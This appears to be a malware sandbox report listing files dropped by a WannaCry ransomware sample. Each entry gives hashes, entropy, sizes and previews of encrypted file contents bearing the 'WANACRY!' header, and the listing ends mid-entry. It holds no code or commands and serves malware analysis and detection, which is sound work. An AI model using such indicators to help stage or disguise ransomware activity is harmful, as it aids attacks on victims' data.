                                                                                      Preview:WANACRY!......b.e.~u7.[.....g.cY...e(G.....f.....>d.q"G.v.IC.9.Z.h,.Z.}0P.........l..?(.(...v.>J4....W.4.?.t.^..~.....^...$........72@...My..b3....=$<.......?h.c..}F%q...a9N.8/..tK.....(....H,b..Z..S.9G.4...}..!...>....$O....~.=..NUF:D......9..+.k.....~......#.......Mf.0E^....JE..Q^..I.g.O.....)5..P.$i.4...-...X...TrO.y...Db.n........b.~ ........l;...........[....D6v%/J..-jA.|1tr.wl....b.-....V.J..l%.`.W..M..Y1u`]....D....|]P.)r.`sj..|+Y*..7.h.X.*b.J.NB.h#..e....d.......*V.........3U....>+..v..L5.W.ZV...A*$...+...-8.../..A7.G..FF."...K.p..(J..{q2..Z
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):584
                                                                                      Entropy (8bit):7.607255901396171
                                                                                      Encrypted:false
                                                                                      SSDEEP:12:bkEndHPtMjnM2JiAjA0EOc09oOlO+OCST6ywkNgZ7aSoQyJwe396TjqPqVy:bkUlMjnMtAjY50SOOL5T65kqopBITZy
                                                                                      MD5:068520C7F0ED59A458A715310E052A77
                                                                                      SHA1:A484D9FFB0A99A77E5C756FA37AC8E3C753B1C30
                                                                                      SHA-256:5B71B08D52C2C8D66EDE8976236E0EFE15E7B8CCF0D27A77BFB2F5FED92AF9BB
                                                                                      SHA-512:174DA4A47F781763CF3C30C6491B9FB0C5A8E228C480DC586B5ECEBAD63B55D8F910D8A0DCF6360545780B1807E046BCE2DEB31CF3DE2AA27D1F61DCEFF61BDE
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!......b.e.~u7.[.....g.cY...e(G.....f.....>d.q"G.v.IC.9.Z.h,.Z.}0P.........l..?(.(...v.>J4....W.4.?.t.^..~.....^...$........72@...My..b3....=$<.......?h.c..}F%q...a9N.8/..tK.....(....H,b..Z..S.9G.4...}..!...>....$O....~.=..NUF:D......9..+.k.....~......#.......Mf.0E^....JE..Q^..I.g.O.....)5..P.$i.4...-...X...TrO.y...Db.n........b.~ ........l;...........[....D6v%/J..-jA.|1tr.wl....b.-....V.J..l%.`.W..M..Y1u`]....D....|]P.)r.`sj..|+Y*..7.h.X.*b.J.NB.h#..e....d.......*V.........3U....>+..v..L5.W.ZV...A*$...+...-8.../..A7.G..FF."...K.p..(J..{q2..Z
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):9704
                                                                                      Entropy (8bit):7.980037334694593
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:8pgmZnZr/kc4vFEPUKb6xqBSIvcbNuAIkong9hMwkQXJYz:KgmZZr/GvFkb6DNdonkhXWz
                                                                                      MD5:CF03DF9A14CD3E91088D067D3D546A1D
                                                                                      SHA1:0F941F19431B6419AEDF613AFB0034B366159443
                                                                                      SHA-256:F934BAAB1DA4CFBEAFA22C6B35BBF3331C0AD625F3B78D8E18D74241366A3893
                                                                                      SHA-512:873863128EECF78CACCBA61967B16B036A26BE60042CCECFDC9D9A9EDFD0581A29814DB21F6AEBF32703DDF2563633834E72B38303A944221DC0B7ABB37062B1
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....:. ..m..y'r... j1.eq......Sfu......l.7.bm..p...i..<[.pr....m...2..{....$)......N<+.>k**..aU.:n..{..+..b...6[i...3.JSWH../K..QG-N.y...f.!..$.ff...@t>....[..bt.c.:....J..J...h.<.^y...........r..e..0.I.....C...%HIe#9../...>.HQ..mZ......5.:_..A.....$......%..d..MG...........h...X..`...2V.......R.l....."..7%&.R......|..mR3w S...A.w0.h.r.(..7Q...u._..q.W...P....W..8.U*j.(.}.;.p:..<3.4a7(Dd.S...~.s......-.D..m...c.E....P..F.. ..~..L...o..x...X....zy..=.v......K.M..S....kIS......_G...%./...+<.....).1.f......@.x.B.....*aR...Po(2.M......P_.?K.r...9..ky/.4..N..3+.k.T4r.j.....n....-......].m.r]...B.Z`;...$.....0.^gN.......HK..1....)\...E....,.'9....w..o.N...&I....>..B.1..:Q..6f......]...m..W_.4......q.....O...w..x.....p#...>R..F........\Y...I.f0.v.....tk&`..\..(.H....6.Z..Us.k...E...........,hZx.iE..I...!Mz[...B..]|!.g....O.@.K..z..5.#.. ..(.......MC?IJCI.4;}.b.F).d.hn.{;9..!..>q.=..3.A{..=.D^.ol...n..5.h..a..M.....z.].....s.G.F....
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):9704
                                                                                      Entropy (8bit):7.980037334694593
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:8pgmZnZr/kc4vFEPUKb6xqBSIvcbNuAIkong9hMwkQXJYz:KgmZZr/GvFkb6DNdonkhXWz
                                                                                      MD5:CF03DF9A14CD3E91088D067D3D546A1D
                                                                                      SHA1:0F941F19431B6419AEDF613AFB0034B366159443
                                                                                      SHA-256:F934BAAB1DA4CFBEAFA22C6B35BBF3331C0AD625F3B78D8E18D74241366A3893
                                                                                      SHA-512:873863128EECF78CACCBA61967B16B036A26BE60042CCECFDC9D9A9EDFD0581A29814DB21F6AEBF32703DDF2563633834E72B38303A944221DC0B7ABB37062B1
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....:. ..m..y'r... j1.eq......Sfu......l.7.bm..p...i..<[.pr....m...2..{....$)......N<+.>k**..aU.:n..{..+..b...6[i...3.JSWH../K..QG-N.y...f.!..$.ff...@t>....[..bt.c.:....J..J...h.<.^y...........r..e..0.I.....C...%HIe#9../...>.HQ..mZ......5.:_..A.....$......%..d..MG...........h...X..`...2V.......R.l....."..7%&.R......|..mR3w S...A.w0.h.r.(..7Q...u._..q.W...P....W..8.U*j.(.}.;.p:..<3.4a7(Dd.S...~.s......-.D..m...c.E....P..F.. ..~..L...o..x...X....zy..=.v......K.M..S....kIS......_G...%./...+<.....).1.f......@.x.B.....*aR...Po(2.M......P_.?K.r...9..ky/.4..N..3+.k.T4r.j.....n....-......].m.r]...B.Z`;...$.....0.^gN.......HK..1....)\...E....,.'9....w..o.N...&I....>..B.1..:Q..6f......]...m..W_.4......q.....O...w..x.....p#...>R..F........\Y...I.f0.v.....tk&`..\..(.H....6.Z..Us.k...E...........,hZx.iE..I...!Mz[...B..]|!.g....O.@.K..z..5.#.. ..(.......MC?IJCI.4;}.b.F).d.hn.{;9..!..>q.=..3.A{..=.D^.ol...n..5.h..a..M.....z.].....s.G.F....
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):10056
                                                                                      Entropy (8bit):7.981781821088313
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:FtsIkE9T7IzimvubboxuFyQZodGtSe/QiB1T5ySPTf0oAr5dd:FtsIhiHUo8BogtSe4i75yUTfDArTd
                                                                                      MD5:108E62828817D0D5CDB6D01B406CDD83
                                                                                      SHA1:13797ABA85F259655E86C9BB9970C185890E24FB
                                                                                      SHA-256:D0128A3E188ABF61DA23DC1BAE65EF312AE6E37582738633DED72E699F6066B4
                                                                                      SHA-512:FA98F5DAA36C47B49C401234050376B83BDB2C142ADCD2ABF84A6877F1969E441CEEC8F017E52420617EBE83CF81E3B2061483F58C07188909BE3427B797BC0D
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....W(T../.H....].,..ni{y.+T..,A.....6....dt. ..j..Ww.v.qC....`m.K..C..*...W<..*.[..O.[j?rE>S.....<W..."..)..j.s...37.F.[G..j.KT..xHMF..^...e.d......].[..).ZV...tx...\...%f.*.:....WK..r...c.z..m8.xe..\.*......-i.:..:.M......(m.k..V0*.@....*......Z!p....*&...........a.r... .M......e5.....9N..(4.....X......*..:..6....B!SC.>.TE..w.....}7....{bh|../...lE......x.W.M....&....,N....G..<.....m......1.z..f.....x......F.Q....z@.cP...&~...M6...c...?..$.......}0N.f..........9....%HS....c...F".?!t4..P..!d0>....V.a.T?d.#X.......z...U...O.ys#%...Ea..iGg.....B...c(...BS.......tX..nO...U.%..&u..l8.....|_<%.ID..).r.k.W..w..E..iUd8^..B..".\!f.s..nY.....L..A..c..g`.6......p`..K...^"..'...N.B..=.......6..67.ch.RX<..)........%.|.....[.#jl#.@[.,]..E...H.../-.....i.s.<..:$.T...<1.r....+..........(%.......I.(.V...~.g..].........|........Mt.f._6dC...t......Xh.P........eZ...#G.V.2..^....v.g,0.U....x........z.C..~!......:.. ..9.U....>...v...<<....a....m=....E.w.@..}*.g...V;.
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):10056
                                                                                      Entropy (8bit):7.981781821088313
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:FtsIkE9T7IzimvubboxuFyQZodGtSe/QiB1T5ySPTf0oAr5dd:FtsIhiHUo8BogtSe4i75yUTfDArTd
                                                                                      MD5:108E62828817D0D5CDB6D01B406CDD83
                                                                                      SHA1:13797ABA85F259655E86C9BB9970C185890E24FB
                                                                                      SHA-256:D0128A3E188ABF61DA23DC1BAE65EF312AE6E37582738633DED72E699F6066B4
                                                                                      SHA-512:FA98F5DAA36C47B49C401234050376B83BDB2C142ADCD2ABF84A6877F1969E441CEEC8F017E52420617EBE83CF81E3B2061483F58C07188909BE3427B797BC0D
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....W(T../.H....].,..ni{y.+T..,A.....6....dt. ..j..Ww.v.qC....`m.K..C..*...W<..*.[..O.[j?rE>S.....<W..."..)..j.s...37.F.[G..j.KT..xHMF..^...e.d......].[..).ZV...tx...\...%f.*.:....WK..r...c.z..m8.xe..\.*......-i.:..:.M......(m.k..V0*.@....*......Z!p....*&...........a.r... .M......e5.....9N..(4.....X......*..:..6....B!SC.>.TE..w.....}7....{bh|../...lE......x.W.M....&....,N....G..<.....m......1.z..f.....x......F.Q....z@.cP...&~...M6...c...?..$.......}0N.f..........9....%HS....c...F".?!t4..P..!d0>....V.a.T?d.#X.......z...U...O.ys#%...Ea..iGg.....B...c(...BS.......tX..nO...U.%..&u..l8.....|_<%.ID..).r.k.W..w..E..iUd8^..B..".\!f.s..nY.....L..A..c..g`.6......p`..K...^"..'...N.B..=.......6..67.ch.RX<..)........%.|.....[.#jl#.@[.,]..E...H.../-.....i.s.<..:$.T...<1.r....+..........(%.......I.(.V...~.g..].........|........Mt.f._6dC...t......Xh.P........eZ...#G.V.2..^....v.g,0.U....x........z.C..~!......:.. ..9.U....>...v...<<....a....m=....E.w.@..}*.g...V;.
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):16664
                                                                                      Entropy (8bit):7.9879295548455564
                                                                                      Encrypted:false
                                                                                      SSDEEP:384:azmSLkQF4dth7oLHvXxiXUuxAEMdIGRjnoajOnDOMH/E5:qkQmwDvXejAVd7PjySMO
                                                                                      MD5:C55DEE57A2EE3FF8788C049071547DB1
                                                                                      SHA1:1CF357385D2C449FD49C707084A34F21BED495B1
                                                                                      SHA-256:B72907B693F371FFE428414F5F2BE4F26A75181109DCC3ECA4F76FA07C790990
                                                                                      SHA-512:6231FF21A95FADC92EA54FC980824AD9AEE14811A685AD18727E4D61B401B7F610499E1C2228D0C1113A6CE761238DBFD53C80B2FEA1CE8C282AF63FDD9FA50B
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....U...s..7E..A....f.@O..:...gb.y...+$......{."./..cei......../...Z%SE......n.Mz.FG........O8z.@.#w.......b..V..2Jb......g.evA~Oj....6.i.>3....0_U.%}.w.W..o...R.%..........$.vsz...YO..3..D.!.J....[.c..CLb.h.?..........5.F5G.QR1q7.5......X..*am.....@.......7TqUl..H..........M........[M.6....~.-.;.kNc./.Am.1...1E.#......B...:......|....sx.M..r.7...;)k.Z..-.......9n..By...f..T....{XX,.!.G..~.ZIxn!..\...\.~C..(..(.....K.MOS.e..R@>... ..Rp..}H..~...F.~!.f>...u.GP0d.."...|.....l."..H...7.Z...$.lr..Fe.C.[..o...........kCw..o......k".wf..G....Jp... ....3T..s".+j.?....)iF.d.0.?C..(.u...V..1..tj...s..X...(...k.2.h...aa.x1.R./-~s.....t.....P..7!..F.{..1Cjh.s~M.&....^...L....L. .;....,..........@.F..2../...lup.1...,..d..7.2..U....L"<.Q......8i.....C.GM:......!?34.OD..5...@..-.....#0......~........@.k.O..7y..........Tj.1......&h..Kj...EIx.v....1+*...u.b...hi................m...%<...X.{.R..2r.q.2...D.Yk.[*.-NB..o._.~.v}._.S..
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):16664
                                                                                      Entropy (8bit):7.9879295548455564
                                                                                      Encrypted:false
                                                                                      SSDEEP:384:azmSLkQF4dth7oLHvXxiXUuxAEMdIGRjnoajOnDOMH/E5:qkQmwDvXejAVd7PjySMO
                                                                                      MD5:C55DEE57A2EE3FF8788C049071547DB1
                                                                                      SHA1:1CF357385D2C449FD49C707084A34F21BED495B1
                                                                                      SHA-256:B72907B693F371FFE428414F5F2BE4F26A75181109DCC3ECA4F76FA07C790990
                                                                                      SHA-512:6231FF21A95FADC92EA54FC980824AD9AEE14811A685AD18727E4D61B401B7F610499E1C2228D0C1113A6CE761238DBFD53C80B2FEA1CE8C282AF63FDD9FA50B
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....U...s..7E..A....f.@O..:...gb.y...+$......{."./..cei......../...Z%SE......n.Mz.FG........O8z.@.#w.......b..V..2Jb......g.evA~Oj....6.i.>3....0_U.%}.w.W..o...R.%..........$.vsz...YO..3..D.!.J....[.c..CLb.h.?..........5.F5G.QR1q7.5......X..*am.....@.......7TqUl..H..........M........[M.6....~.-.;.kNc./.Am.1...1E.#......B...:......|....sx.M..r.7...;)k.Z..-.......9n..By...f..T....{XX,.!.G..~.ZIxn!..\...\.~C..(..(.....K.MOS.e..R@>... ..Rp..}H..~...F.~!.f>...u.GP0d.."...|.....l."..H...7.Z...$.lr..Fe.C.[..o...........kCw..o......k".wf..G....Jp... ....3T..s".+j.?....)iF.d.0.?C..(.u...V..1..tj...s..X...(...k.2.h...aa.x1.R./-~s.....t.....P..7!..F.{..1Cjh.s~M.&....^...L....L. .;....,..........@.F..2../...lup.1...,..d..7.2..U....L"<.Q......8i.....C.GM:......!?34.OD..5...@..-.....#0......~........@.k.O..7y..........Tj.1......&h..Kj...EIx.v....1+*...u.b...hi................m...%<...X.{.R..2r.q.2...D.Yk.[*.-NB..o._.~.v}._.S..
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):4376
                                                                                      Entropy (8bit):7.951642699710332
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:oWunjiHhFQKR6JPTXJBg94pJ1+dup/ib9SgrXM92ynvOskNp7UWFaJ+T/rPu:gnmHfQ26hXfrvp/S5uODN6kV/rW
                                                                                      MD5:2D34D9C188A172B24A4CEA916D884EF1
                                                                                      SHA1:F6870F0598DA957BAA27743D8C4C2788C3EDA8CA
                                                                                      SHA-256:08E3BDFF5731A8CA9C8B85A9CBE9947B2A6F77A7687CD8E05A53D6194414489D
                                                                                      SHA-512:A6211300AEDBBEA41F1DE407E6951C1DED2FAC1A211F35DC8CAAD204FB679CF144C5CD91549288293A1C479DF402E4BAF6DF1666F4F63E8C579A69EC4BF8AFD8
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!......6B......D.+.E..........L..h..U.5....?....Z)}...]_..#.m..u.b..<4.BT..*_N..k.|...^M..P....f.....{L.u.,VSzl+.o...$..5..(p.Q9e1...F.<s...P...=..... ..v.GJ90.[....M..D0.7.p...8M...\......Yo.H.M...J.N?....*....C...5...-.=(.3S..A..fE.f..G.................%.19J..G....[..m\.'..._5J.......T..2..q...y....Ea..a.%...=.|..#!..|&..."......{..I..Q.yc..{.w..$+.['.. .#.=.wY.k.?....ie...QAn.elg..d...X|.Y.R..&(..t,@z.*.x..n.o.....w..`...r.Pz..../.zwp.)}Q.......X..........^.g.@.8.i....]y{z.'..}.l...m.....U....>...Ik.k./.'......~.-.$.{...6...F..).......h.u...f>f.6F.=.6...Sx.\......8...d.(..$........^.....->k+..z.. ..K..i......G..;.z.}QO.4.#..B....N../f.^...e}@l.r.6...'N.u"..Z.L..Z.....L.)...~..'...a..1.rt.Gmk......w1."L..Dj..Dj.GlO..&....}Y....X.<....Y..N..yU+.....y.a..)....D,..3&A'..*.M(..)rI:...5......8PB..R.RW...j.EM......J.EY.xr......t.I..9..OP.Hx.....q]z..[..e.;.v......tj.%qj.nC|...j`.;........$!..i..Y.R.!...;d.....e.4.$.y.u.[z
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):4376
                                                                                      Entropy (8bit):7.951642699710332
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:oWunjiHhFQKR6JPTXJBg94pJ1+dup/ib9SgrXM92ynvOskNp7UWFaJ+T/rPu:gnmHfQ26hXfrvp/S5uODN6kV/rW
                                                                                      MD5:2D34D9C188A172B24A4CEA916D884EF1
                                                                                      SHA1:F6870F0598DA957BAA27743D8C4C2788C3EDA8CA
                                                                                      SHA-256:08E3BDFF5731A8CA9C8B85A9CBE9947B2A6F77A7687CD8E05A53D6194414489D
                                                                                      SHA-512:A6211300AEDBBEA41F1DE407E6951C1DED2FAC1A211F35DC8CAAD204FB679CF144C5CD91549288293A1C479DF402E4BAF6DF1666F4F63E8C579A69EC4BF8AFD8
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!......6B......D.+.E..........L..h..U.5....?....Z)}...]_..#.m..u.b..<4.BT..*_N..k.|...^M..P....f.....{L.u.,VSzl+.o...$..5..(p.Q9e1...F.<s...P...=..... ..v.GJ90.[....M..D0.7.p...8M...\......Yo.H.M...J.N?....*....C...5...-.=(.3S..A..fE.f..G.................%.19J..G....[..m\.'..._5J.......T..2..q...y....Ea..a.%...=.|..#!..|&..."......{..I..Q.yc..{.w..$+.['.. .#.=.wY.k.?....ie...QAn.elg..d...X|.Y.R..&(..t,@z.*.x..n.o.....w..`...r.Pz..../.zwp.)}Q.......X..........^.g.@.8.i....]y{z.'..}.l...m.....U....>...Ik.k./.'......~.-.$.{...6...F..).......h.u...f>f.6F.=.6...Sx.\......8...d.(..$........^.....->k+..z.. ..K..i......G..;.z.}QO.4.#..B....N../f.^...e}@l.r.6...'N.u"..Z.L..Z.....L.)...~..'...a..1.rt.Gmk......w1."L..Dj..Dj.GlO..&....}Y....X.<....Y..N..yU+.....y.a..)....D,..3&A'..*.M(..)rI:...5......8PB..R.RW...j.EM......J.EY.xr......t.I..9..OP.Hx.....q]z..[..e.;.v......tj.%qj.nC|...j`.;........$!..i..Y.R.!...;d.....e.4.$.y.u.[z
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):80488
                                                                                      Entropy (8bit):7.997990904224932
                                                                                      Encrypted:true
                                                                                      SSDEEP:1536:gY15JuyWefIm71Dee/rAa6ib6s73yrNAsOwNSF+EHNdnuryKFSOv:/1XuyTftZDprAa6M683SNewjaN90/
                                                                                      MD5:3BA5A9FCDBA83802A0017158E8A7B1A5
                                                                                      SHA1:4BE92974E86FC3A108DBD923B5DC3EE9D0CE89A7
                                                                                      SHA-256:F7D1DA9446C09A95AF3158A814FA155B277C08BA71B901E994C5775F43B277A8
                                                                                      SHA-512:ADCB621871913584BBC8AC640EC4FEC9A9543A679571626593313F701316A8D8624A43F2E3EFA83EBC12D1FD4791BF19DA3A88C35230DD46227661DB0225AD49
                                                                                      Malicious:true
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!............t{..a^.`..........I.q.0L.+.rQ..N.........N..[...1zZ.....*......R.H..+.x.{.[.*.].>..w.%C.q..JgJ...5.......#...q.h...C......<K.t.ck.r..s..!.zy(..@.X.)q..f........4^n...cS._-v.i.W........rn...?X)...l.O.rmR...A..`...(s.,......P.;c.3V....y`....D9........B_..G....|...{.W8O .UB.t....#.p.._.z.Y.....>.?.;.d..f2c..C.am{......G..Rl!.0....P..YU..9.g..w....;..<.#....&.?.Z..%.<....x5koVr..k..n...j...W..i..<..6.\.._..~..Ww.....s...9........{.I..-..U..q..xY;.q.|..(@O.....{.R..te..%.[.1....&De..6%$..7[.r..c...9...(..M.,R.DB..>...~...EN..S[y..Q...(."...a...."w;.-..........BK.{..Q..&.?..)`.C.0..Z..U#..\...HK$;Z......Td:&....d\%jeP$.%.?..6&K.y..\ #...-v.=.f......A...!..j`3..j.L...i..7......u".S....-r.R.....4...[t...WM.u...`.=...K.%...t7.....&G.6}x.^X.+...V.o.~.....F{.2..9.].[...5....|.G../V61.w[-s.6.,..o.......{.XX$..>~?...U.2y.!......q..Kd....BP........>.Um]8(\B<...]..'Em.qS..T....q..rk .T.0...,....6....p3..'(.....S._....~.O[...JH...
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):80488
                                                                                      Entropy (8bit):7.997990904224932
                                                                                      Encrypted:true
                                                                                      SSDEEP:1536:gY15JuyWefIm71Dee/rAa6ib6s73yrNAsOwNSF+EHNdnuryKFSOv:/1XuyTftZDprAa6M683SNewjaN90/
                                                                                      MD5:3BA5A9FCDBA83802A0017158E8A7B1A5
                                                                                      SHA1:4BE92974E86FC3A108DBD923B5DC3EE9D0CE89A7
                                                                                      SHA-256:F7D1DA9446C09A95AF3158A814FA155B277C08BA71B901E994C5775F43B277A8
                                                                                      SHA-512:ADCB621871913584BBC8AC640EC4FEC9A9543A679571626593313F701316A8D8624A43F2E3EFA83EBC12D1FD4791BF19DA3A88C35230DD46227661DB0225AD49
                                                                                      Malicious:true
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!............t{..a^.`..........I.q.0L.+.rQ..N.........N..[...1zZ.....*......R.H..+.x.{.[.*.].>..w.%C.q..JgJ...5.......#...q.h...C......<K.t.ck.r..s..!.zy(..@.X.)q..f........4^n...cS._-v.i.W........rn...?X)...l.O.rmR...A..`...(s.,......P.;c.3V....y`....D9........B_..G....|...{.W8O .UB.t....#.p.._.z.Y.....>.?.;.d..f2c..C.am{......G..Rl!.0....P..YU..9.g..w....;..<.#....&.?.Z..%.<....x5koVr..k..n...j...W..i..<..6.\.._..~..Ww.....s...9........{.I..-..U..q..xY;.q.|..(@O.....{.R..te..%.[.1....&De..6%$..7[.r..c...9...(..M.,R.DB..>...~...EN..S[y..Q...(."...a...."w;.-..........BK.{..Q..&.?..)`.C.0..Z..U#..\...HK$;Z......Td:&....d\%jeP$.%.?..6&K.y..\ #...-v.=.f......A...!..j`3..j.L...i..7......u".S....-r.R.....4...[t...WM.u...`.=...K.%...t7.....&G.6}x.^X.+...V.o.~.....F{.2..9.].[...5....|.G../V61.w[-s.6.,..o.......{.XX$..>~?...U.2y.!......q..Kd....BP........>.Um]8(\B<...]..'Em.qS..T....q..rk .T.0...,....6....p3..'(.....S._....~.O[...JH...
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):11848
                                                                                      Entropy (8bit):7.983204556391692
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:1bIhEBZEVsd/t9TXYEevy2KgHD/b0+bXBTcNL7b20mksf:ZQCoq9TXyyrubfDBTcNb0
                                                                                      MD5:D78F8EDD36C72DE9357CE0C4BF7BD8EE
                                                                                      SHA1:CE79C5BBD97216F06DB7ED6C02E570E7EF5C43EC
                                                                                      SHA-256:0CDA90B4EF47BA5F04D8B60B7B421E545AB41FD7505012E0AE5DBE44B9EAC3D0
                                                                                      SHA-512:85E1BF51AADFACF74EDF2AC1F6BAFD3DEE376E20647F87F334BD696896489142D3BBE76EA12C74BF9899BA9B5940011C7D886CB0407E0573DDA1960B2B1470A8
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!.....v?..\U.t{w..?.....3.3...!"#.".G^5=..Ekp..fI...f_#..O/b......?.V....Z0P...?...Qy......z!Q+.J...t....9=e.Q_....)......L].g..d....K..F.t.[..j}q....#.Q..M..K....p.Q...'. {.tS.t.}.s.........Q..$...yO.zS........r...6.?.8..'.....)....U.G;...Rx...../-.......{...?..].Pds6.J7E..cP...NJ.;g..D..V:.T..^.2J.l...jF.e.......E..3.M.N. D..L.....P.o.:QT.^.K2&.8GN=....hh.V....}.P.R..;..y.`.].p...6...w.a'...+8S[.r.`.....6N... ..,K.3..Y#....E.p.i..-...".....r..)...h.(.......&..D&.l.E0.W...X..w....Z$.....h..Jp.6Z....'....S.......?..^....=...M.e:6....V.X'..R.T..@......v.a......rs.}........D.]...>.?..KU.8....K....V...h...)G`.*D...rO...e..%.F..xy`..7.m..\.. G....[.`..23sp..2.G..C.....J(m^..E...,p.2....G.....A.9.W....{.........l1s.x..M.0..w.....y.m....m.k?@\.Km4.r..e..H.0.....C..*..g.<.......M..w....V.....*I+..\....;........@......{...B......I.......w.q.{.?)T.?.~........[..6H..cD....Iw..P>.J.`ta..u.&..g..........?.S.q.....w8.C......5}.l.}.\
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):11848
                                                                                      Entropy (8bit):7.983204556391692
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:1bIhEBZEVsd/t9TXYEevy2KgHD/b0+bXBTcNL7b20mksf:ZQCoq9TXyyrubfDBTcNb0
                                                                                      MD5:D78F8EDD36C72DE9357CE0C4BF7BD8EE
                                                                                      SHA1:CE79C5BBD97216F06DB7ED6C02E570E7EF5C43EC
                                                                                      SHA-256:0CDA90B4EF47BA5F04D8B60B7B421E545AB41FD7505012E0AE5DBE44B9EAC3D0
                                                                                      SHA-512:85E1BF51AADFACF74EDF2AC1F6BAFD3DEE376E20647F87F334BD696896489142D3BBE76EA12C74BF9899BA9B5940011C7D886CB0407E0573DDA1960B2B1470A8
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!.....v?..\U.t{w..?.....3.3...!"#.".G^5=..Ekp..fI...f_#..O/b......?.V....Z0P...?...Qy......z!Q+.J...t....9=e.Q_....)......L].g..d....K..F.t.[..j}q....#.Q..M..K....p.Q...'. {.tS.t.}.s.........Q..$...yO.zS........r...6.?.8..'.....)....U.G;...Rx...../-.......{...?..].Pds6.J7E..cP...NJ.;g..D..V:.T..^.2J.l...jF.e.......E..3.M.N. D..L.....P.o.:QT.^.K2&.8GN=....hh.V....}.P.R..;..y.`.].p...6...w.a'...+8S[.r.`.....6N... ..,K.3..Y#....E.p.i..-...".....r..)...h.(.......&..D&.l.E0.W...X..w....Z$.....h..Jp.6Z....'....S.......?..^....=...M.e:6....V.X'..R.T..@......v.a......rs.}........D.]...>.?..KU.8....K....V...h...)G`.*D...rO...e..%.F..xy`..7.m..\.. G....[.`..23sp..2.G..C.....J(m^..E...,p.2....G.....A.9.W....{.........l1s.x..M.0..w.....y.m....m.k?@\.Km4.r..e..H.0.....C..*..g.<.......M..w....V.....*I+..\....;........@......{...B......I.......w.q.{.?)T.?.~........[..6H..cD....Iw..P>.J.`ta..u.&..g..........?.S.q.....w8.C......5}.l.}.\
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1179240
